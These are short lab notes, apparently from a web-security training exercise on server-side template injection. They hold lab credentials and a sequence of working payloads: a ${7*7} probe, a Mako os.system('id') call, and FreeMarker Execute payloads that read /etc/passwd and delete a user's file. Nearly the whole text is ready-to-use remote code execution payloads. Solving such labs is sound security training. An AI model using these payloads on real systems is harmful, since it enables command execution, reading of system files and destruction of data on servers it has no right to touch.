Lab: Server-side template injection using documentation

c

content-manager : C0nt3ntM4n4g3r

c

${7*7}

c

.
.
.
${7*7}
${self.module.cache.util.os.system("id")}
.
.
.

https://medium.com/@armaanpathan/breaking-the-barrier-remote-code-execution-via-ssti-in-freemarker-template-engine-9797079752ac

c

${ "freemarker.template.utility.Execute" ?new()( "cat /etc/passwd" )}


<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("rm /home/carlos/morale.txt") }